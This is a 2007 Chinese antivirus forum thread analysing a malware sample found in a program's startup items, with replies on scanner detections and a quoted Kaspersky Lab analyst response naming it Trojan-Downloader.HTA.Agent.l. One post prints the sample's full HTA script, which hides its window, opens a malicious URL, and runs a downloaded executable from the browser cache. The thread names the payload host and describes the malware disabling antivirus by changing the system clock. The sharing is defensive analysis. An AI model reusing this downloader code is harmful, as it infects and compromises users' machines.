可疑，竟然在程序的启动项里 [MD5: 3927C1]

显示全部楼层 · 发表于 2007-6-13 19:36:41

过了AVK2006,小红伞

显示全部楼层 · 发表于 2007-6-13 19:41:28

里面的主要内容，用于用IE访问有毒网页的：

<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://y66.us/oKK/Url2.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\smss1[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>

复制代码

显示全部楼层 · 发表于 2007-6-13 19:41:29

NOD32静态扫描没报,可以激活后网页监控发现了.

显示全部楼层 · 发表于 2007-6-13 19:44:25

这个y66.us就是以前的那个5y5.us/16a.us

一直流行的，好几个月了

显示全部楼层 · 发表于 2007-6-13 21:50:47

哇！
真的太吓人啦！

显示全部楼层 · 发表于 2007-6-13 22:43:33

1K的东西也不可小看

显示全部楼层 · 发表于 2007-6-13 22:51:05

detected: virus Virus.Win32.AutoRun.am URL: http://y66.us/oKK/smss1.exe//PE_Patch.UPX//UPX

显示全部楼层 · 发表于 2007-6-13 22:51:25

这个就是autorun病毒更新的网址，常去常新。

主要是针对卡巴改时间的，因为卡巴自我防护很好，病毒只能通过修改时间让key失效，从而使卡巴监控失效，然后在失效的时候疯狂下载病毒。

这个病毒已经跟卡巴干上了，卡巴处理这个病毒，入库这个病毒的速度要比一般病毒快。

[ 本帖最后由 aerbeisi 于 2007-6-13 22:53 编辑 ]

显示全部楼层 · 发表于 2007-6-13 23:09:38

Hello,

Server.hta - Trojan-Downloader.HTA.Agent.l

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Yaroslav Kirillov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.

> Attachment: Server.zip

[病毒样本] 可疑，竟然在程序的启动项里 [MD5: 3927C1]

本帖子中包含更多资源

本帖子中包含更多资源